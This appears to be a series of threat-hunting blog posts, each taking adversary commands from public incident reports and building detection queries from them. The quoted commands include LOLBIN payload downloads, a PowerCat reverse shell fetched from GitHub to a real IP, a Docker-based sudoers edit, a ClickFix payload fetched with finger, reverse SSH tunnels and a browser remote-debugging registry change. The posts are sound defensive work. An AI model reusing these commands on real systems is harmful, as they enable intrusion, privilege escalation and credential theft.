Know Your Adversary

Hello everyone! Today we'll look at an example of how adversaries use Device Credential Deployment for hiding console window - Hide Artifacts: Hidden Window (T1564.003) . According to this report , the adversary leveraged  DeviceCredentialDeployment.exe to stealthily run cmd.exe . This binary shouldn't be run under normal circumstances, so it may point to malicious activity, and is a good target for hunting: event_type: "processcreatewin" AND proc_file_originalfilename: "devicecredentialdeployment.exe" See you tomorrow!

Hello everyone! In almost every case adversaries need to download additional tools to the compromised system. Very often they use LOLBINs to solve this task. Let's look at some of them. For example, according to this report , the adversary leveraged multiple LOLBINs: bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe curl -o $public\libraries\service.exe http://<HOST>/service.exe certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe' Such activities are great targets for hunting and detection. So, make sure you are covering it. For example, BITSAdmin: event_type: "processcreatewin" AND proc_file_path: "bitsadmin.exe" AND cmdline: "transfer" See you tomorrow!

Hello everyone! I'm sure you already heard about Shai-Hulud, we even talked about it already, but let's look at the new version, and focus on privilege escalation tactic. So, here's the report . Let's look at Figure 11. First, the adversary checks if passwordless sudo access is available: sudo -n true If not, it leverages Docker's privileged container access to mount the host filesystem and modify the sudoers configuration file: docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner" Both can be good hunting opportunities! Let's start from sudo: event_type: "processcreatenix" AND cmdline: "sudo -n true" And for Docker abuse: event_type: "processcreatenix" AND cmdline: ("docker" AND "run" AND "privileged" AND "cp" AND "sudoers.d") See you tomorrow!

Hello everyone! Today we'll look at another example of proxy execution, and focus on the following sub-technique:  System Binary Proxy Execution: MMC (T1218.014) . According to this report , Water Gamayun leveraged malicious MSC files, which exploited MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, leveraging TaskPad snap-in commands to run PowerShell commands, for example: powershell.exe" -w H -eC aQBlAHgAIAAoACcAcABvAF8AdwBlAF8AcgBzAF8AaABlAF8AbABsACAALQBlAF8AQwAgAFMAUQBCAHUAQQBIAFkAQQBiAF8AdwBCAHIAQQBHAFUAQQBMAFEAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBfAEIAMQBBAEcAVQBBAGMAdwBCADAAQQBDAEEAQQBMAFEAQg[redacted] So, in this case, mmc.exe spawns powershell.exe. We can transform it into a query: event_type: "processcreatewin" AND proc_p_file_path: "mmc.exe" AND proc_file_path: "powershell.exe" See you tomorrow!

Hello everyone! We often use Windows Event Logs during our incident response engagements, but adversaries may also use it, for example, for discovery. Let's dig into this report . The adversary leveraged SharpADUserIP, which enables them to collect information about user names and their IP addresses from Security log, as we as the following PowerShell command to extract similar information from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational: powershell -Command Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }} So, we can hunt for suspicious...

Hello everyone! I always love to see creative ways of malware delivery. Thie time adversaries leveraged malicious .blend files uploaded to free 3D assets sites. According to the report , embedded Python script fetched a loader from workers[.]dev URL, which is a PowerShell script. The script downloads two archives: one contains a Python environment with StealC, the other - a Python Stealer. So, what to hunt for? Some examples: - Execution of suspicious .blend files. - Communications with workers[.]dev initiated by suspicious processes. - Suspicious LNK files in the Startup folder. - Execution of suspicious Python scripts (Yes, they are, for example, ZalypaGyliveraV1.py). See you tomorrow!

Hello everyone! I mentioned already that sometimes threat actors want to be caught. Let's look at another case and a tool I don't often see to be used ITW. According to this report , the adversary leveraged PowerShell to download and execute PowerCat - an open-source PowerShell-based Netcat utility to start a reverse shell: powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1&#8217;); powercat -c 154.17.26[.]41 -p 8080 -e cmd As you may have noticed, the adversary don't rename the tool. And in many cases it's a very common practice. The same can be said about the repository - threat actors often abuse PowerShell to download tools from official sources. So, it's another notable thing to document and build your detections, for example: event_type: "processcreatewin" AND cmdline: "powercat" Don't forget about the script block - it also contains...

Hello everyone! Let's look at another not common persistence mechanism, which involves abusing Shell Icon Overlay handlers and registry modification. Advanced techniques are for advanced adversaries, so today we'll look at Lazarus  (or Lazer Werewolf). As part of persistence, the threat actors modified the following registry key: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers This allows the adversary to abuse the Shell Icon Overlay handler to load the payload each time the user logs in. So it's another notable registry key for monitoring: event_type: "registryvaluesetwin" AND reg_key_path: "ShellIconOverlayIdentifiers" See you tomorrow!

Hello everyone! Espionage-focused adverasaries often show interest in emails. In some cases they can even read them before exfiltration. And they may need some tools to export them! According to this report , the adversary leveraged XstExport - a legitimate open source tool for exporting the content of Microsoft Outlook OST and PST files: XstExport.exe -e <email>@<domain>.ost2 You don't use it in your environment? Why not to hunt it! event_type: "processcreatewin" AND proc_file_productname: "XstExport" See you tomorrow!

Hello everyone! A very typical behaviour marker for many malware families - executing system discovery commands. And, of course, we can use it for threat hunting! Let's look at  TamperedChef  campaign. The adversary performs registry query to look for the victim's machine ID: reg.exe QUERY "HKLM\Software\Microsoft\Cryptography" /v MachineGuid If we use it for hunting, we'll have to filter lots and lots of false positives, but still it may be a good hypothesis - just focus on parent processes. In our example - it's quite suspicious as it's node.exe , so we can use it to build a query: event_type: "processcreatewin" AND proc_p_file_path: "node.exe" AND proc_file_path: "reg.exe" AND cmdline: "machineguid" See you tomorrow!

Hello everyone! We are often talking about how adversaries abuse RMMs, so let's talk a bit about a curious case of how they hide evidence of remote access. According to this report , the threat actors used HideMouse - an utility, which allows to hide mouse cursor movement, so the can use ScreenConnect they installed previously. Another hunting (or even detection!) opportunity, right? event_type: "processcreatewin" AND proc_file_productname: "HideMouse" See you tomorrow!

Hello everyone! Let's look at NetExec one more time, but this time focus on forensic perspective and related artifacts. Recently the tool was used by Lynx ransomware affiliates. And according to the report , it creates multiple folders and files, which can be used both for detection and forensic analysis. Among others, it creates .nxc folder and lots of databases, for example, smb.db , rdp.db , winrm.db , etc. The databases contain the results of execution of corresponding modules, and may be a forensic goldmine! Also, searching for suspicious folders and files creation events may be a good option as well: event_type: "filecreatewin" AND file_path: ("nxc.conf" OR "ftp.db" OR "ldap.db" OR "mssql.db" OR "nfs.db" OR "rdp.db" OR "smb.db" OR "ssh.db" OR "vnc.db" OR "winrm.db" OR "wmi.db") See you tomorrow!

Hello everyone! We often talking about PowerShell. Yes, adversaries love it. But is it difficult to detect it? Let's find out! As always, we need an example, so let's check a report by eSentire . The adversary executed the following command: powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('hxxp://87.120.219[.]26/P9m4H7S2FqDTof')" What can we learn from it? The threat actors use some intersting command line arguments, and we can use it for hunting, of course: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: ("executionpolicy" AND "bypass") It's just an example, but usually adveraries use quite limited number of suspicious arguments - make sure to document it! See you tomorrow!

Hello everyone! Today we'll talk about another uncommon persistence mechanism, which is not very popular, but still can be seen ITW. And it involves Modify Registry (T1112) . So, to gain persistent access to the compromised system, the adversary modified several registry entries. One of these was  LoadMacroProviderOnBoot under software\microsoft\office\16.0\outlook . If enabled, it allows the automatic loading of any configured VBA macros on startup. Worth a hunt, right? event_type: "registryvaluesetwin" AND reg_key_path: "LoadMacroProviderOnBoot" AND reg_value_data: "0x00000001" See you tomorrow!

Hello everyone! Reading the news, I spotted another interesting variant of ClickFix attack, so let's look at available hunting opportunities. According to the post , the adversary used the Finger executable to download a payload from a remote server and execute it via cmd, for example: "cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'" It's not the first time threat actors use this executable, but as it's not commonly used in modern environments, finger.exe execution may be a suspicious behavior marker itself: event_type: "processcreatewin" AND proc_file_path: "finger.exe" See you tomorrow!

Hello everyone! Let's keep digging into how adversaries misuse legitimate web-services, and this time we'll look at JSON storage services. According to this report , adversaries started to use JSON storage services like JSON Keeper, JSONsilo, and npoint.io to host and deliver malware from trojanized code projects. This knowledge provides us a hunting opportunity: event_type: "dnsreq" AND dns_rname: ("jsonkeeper.com" OR "jsonsilo.com" OR "npoint.io") See you tomorrow!

Hello everyone! It's time to update your PowerShell collection with another procedure example, this time it's related to discovery and credential access. Let's look into the report on Red Likho . The adversary leveraged PowerShell to collect information on KeePass-related files: powershell.exe "Get-ChildItem -Path 'C:\Users\','$env:PROGRAMFILES','env:ProgramFiles(x86)' -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName" And here we have another hunting opportunity: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: (*keepass* AND *kdbx*) See you tomorrow!

Hello everyone! We don't talk a lot about macOS attacks, so lets change it, and look at some examples of  Masquerading: Double File Extension (T1036.007) . Researchers note that adversaries use .scpt AppleScript files more and more often in recent months. Examples include both advanced threats like BlueNoroff and commodity malware, for example, Odissey Stealer and MacSync Stealer. For example, adversaries commonly create fake  .docx and .pptx files:  Stable1 Investment Proposal (Draft) (EN).pptx.scpt ,  AM Management _Strategic OTC Collaboration Proposal.docx.scpt . This provides us some simple detection opportunities: event_type: "processcreatemac" AND cmdline: (*pptx.scpt OR *.docx.scpt) See you tomorrow!

Hello everyone! Let's keep talking about how adversaries misuse various legitimate tools. And this time talk a bit about Protocol Tunneling (T1572) . According to this report , the threat actors leveraged both Plink and Putty to set up an encrypted tunnel: C:\windows\temp\sihosts.exe -batch -hostkey "ssh-rsa 2048 SHA256:<REDACTED>" -ssh -P 433 -l <REDACTED> -pw <REDACTED> -R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46 C:\windows\temp\silcon.exe  -ssh -P 433 -l <REDACTED> -pw <REDACTED>-R 216.107.136[.]46:17400:127.0.0.1:3389 216.107.136[.]46 Yes, we're dealing with renamed executables again, and yes, executables can be renamed legitimately, but it still provides us good hunting oportunities: event_type: "processcreatewin" AND proc_file_originalfilename: "putty" AND NOT proc_file_path: "putty.exe" And the same for Plink: event_type: "processcreatewin" AND proc_file_originalfilename: "...

Hello everyone! Today we'll look at another curious example of  Forced Authentication (T1187) , and a threat actor dubbed Sticky Werewolf. So, the adversary keep expanding its arsenal, and now uses Pulsar RAT. During the analysis of a recent campaign, we observed that the cluster leveraged cURL to obtain authentication material: cmd.exe curl -u : --ntlm hxxp://194.226.121[.]225 And yes, we have another good candidate for hunting: event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: ("u" AND "ntlm") See you tomorrow!

Hello everyone! Let's keep digging in PowerShell procedures, and this time we'll look at how adversaries leverage it for persistence. And today's example is generously provided by Lazarus (or Lazer Werewolf among many other names). The adversary used PowerShell to create a shortcut in the startup folder and enable persistence: cmd.exe /C powershell -Command "$s = (New-Object -COMWScript.Shell).CreateShortcut('C:\\ProgramData\\USOShared\\Micro.lnk'); $s.TargetPath = 'C:\\Windows\\System32\\rundll32.exe'; $s.Arguments = '\"[USOPrivate.dll path]\" LoadMimi \"C:\\Windows\\System32\\cmd.exe\"'; $s.Save()" Similar behavior markers may be related to legitimate activity, so it's a good target for hunting: event_type: "processcreatewin" AND proc_file_path: "powershell.exe" AND cmdline: "CreateShortcut" See you tomorrow!

Hello everyone! Today we'll look at another example of PowerShell abuse. And this time we'll talk about the Discovery tactic. So, let's look into the report on Gootloader . There're multiple interesting examples of PowerShell abuse. The adversary uses it to search for accounts with SPNs: powershell.exe  -command "$search = New-Object DirectoryServices.DirectorySearcher([ADSI]''); $search.Filter = '(&(servicePrincipalName=*)(objectCategory=user))'; $results = $search.FindAll(); foreach ($result in $results) { $u = $result.GetDirectoryEntry(); Write-Host $u.name, $u.samaccountname; foreach ($s in $u.servicePrincipalName) { Write-Host $s; } Write-Host '---'; }" Finds computers where the current user has admin rights: powershell.exe  -ExecutionPolicy bypass -Command "$UBcPGBjR99={param($vars);$nZzkzLTK99=$vars.computer;$Error.clear();Get-WmiObject -Class Win32_OperatingSystem -ComputerName $nZzkzLTK99 -ErrorAction SilentlyContinue;...

Hello everyone! Let's talk about another legitimate utility, which is commonly abused by adversaries and is a great target for hunting. I'm talking about certutil . It's usually used to obtain certificate authority information and configure Certificate Services. But adversaries use it to solve other tasks, of course. And here's an example : certutil.exe -decode C:\Windows\..\ProgramData\bEyjSIpZvbJpjVv9.a9oc C:\Windows\..\ProgramData\hkNlPHP61rvE0T7J.lpxQ So, here the adversary uses the tool to decode the payload, but it's not the only case. Threat actors may also use it to download or encode data. Let's build a query based on all the cases: event_type: "processcreatewin" AND proc_file_path: "certutil.exe" AND cmdline: ("decode" OR "encode" OR "url" OR "urlcache" OR "verifyctl") See you tomorrow!

Hello everyone! Adversaries love proxy execution. And they can use trusted developer utilities to solve this task. Today we'll look at an example of  Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001) . As always, we need an example . The adversary created a scheduled task to execute a malicious XML file with msbuild.exe : schtasks /create /tn \Microsoft\Windows\Ras\Outbound /tr "CSIDL_WINDOWS\microsoft.net\framework\v4.0.30319\msbuild.exe c:\programdata\microsoft\rac\outbound\outbound.xml" /sc minute /mo 60 /ru system We can hunt for msbuild.exe executing files from suspicious folders or with suspicious extensions, for example: event_type: "processcreatewin" AND proc_file_path: "msbuild.exe" AND cmdline: "programdata" See you tomorrow!

Hello everyone! Adversaries keep experimenting with various remote management platforms, so today we'll look at another example of  Remote Access Tools: Remote Desktop Software (T1219.002) . Let's look at  UNK_SmudgedSerpent . The adversary leveraged phishing emails for credential harvesting as well as to deliver archives with MSI files those loaded RMM payloads. In most cases the threat actors used PDQConnect Remote Monitoring & Management software. If you don't use it in your environment, it may be a good target for hunting: event_type: "processcreatewin" AND proc_file_productname: "PDQConnectAgent" You can also hunt for related domains: event_type: "dnsreqwin" AND dns_rname: "app.pdq.com" See you tomorrow!

Hello everyone! Using virtual machines for defense evasion becomes more and more popular. Today we'll look at another example of  Hide Artifacts: Run Virtual Instance (T1564.006) . According to the report , the adversary enabled the Hyper-V feature on a compromised Windows machine, then downloaded and imported a lightweight Alpine Linux-based VM containing their malware. Once downloaded, the virtual machine was imported using PowerShell: "cmd.exe" /C powershell.exe -c import-vm -path "c:\\programdata\\microsoft\\AppV\\app\\Virtual Machines\\1DBCC80B-5803-4AF1-8772-712C688F408A.vmcx" -Copy -GenerateNewId > c:\\Programdata\\WindowsUpdateTask_t.tmp 2>&1 PowerShell was also used to start the newly imported virtual machine: "cmd.exe" /C powershell.exe -c Start-VM -name WSL > c:\\Programdata\\WindowsUpdateTask_R.tmp 2>&1 For example, we can hunt for cmdlets related to virtual machine manipulation: event_type: "processcreatewin" ...

Hello everyone! Today we'll look at another curious example of how adversaries abuse AI to solve various problems, this time they leveraged OpenAI Assistants API. Microsoft DART uncovered a new malware,  SesameOp , which uses OpenAI Assistants API for its command-and-control communications.  The infection chain consists of a loader ( Netapi64.dll ) and a NET-based backdoor ( OpenAIAgent.Netapi64 ). Netapi64.dll is loaded at runtime into the host executable via .NET AppDomainManager injection, as instructed by a crafted .config file accompanying the host executable. So, it's a good hunting idea to look for suspicious connections to  api[.]openai[.]com : event_type: "dnsreqwin" AND dns_rname: "api.openai.com" See you tomorrow!

Hello everyone! Malware installation process often involves unpacking archived data. And today we'll look at how advararies abuse tar, and how to use it for threat hunting. Let's look at  UNC6384 . The adversary leveraged a malicious LNK file, which contained the following command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;" The script does the following...

Hello everyone! I'm sure you know that adversaries abuse remote debugging feature to extract cookies from web-browsers. Today we'll look how threat actors modify registry to enable this feature. If you look through this report , you'll notice that the adversary abused reg.exe to modify registry and allow remote debugging: reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f For example, we can hunt for reg.exe abuse: event_type: "processcreatewin" AND proc_file_path: "reg.exe" AND cmdline: "RemoteDebuggingAllowed" Or you can focus on registry modification: event_type: "registryvaluesetwin" AND reg_key_path: "RemoteDebuggingAllowed" See you tomorrow!

Hello everyone! Today we'll look at another example of  Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002) . According to the report ,  BRONZE BUTLER  accessed multiple cloud storage services via the web browser during remote desktop sessions in order to exfiltrate collected information. If such services are not commonly used in your environment, it's a good target for hunting: event_type: "dnsreqwin" AND dns_rname: ("file.io" OR "ppng.io" OR "limewire.com") See you tomorrow!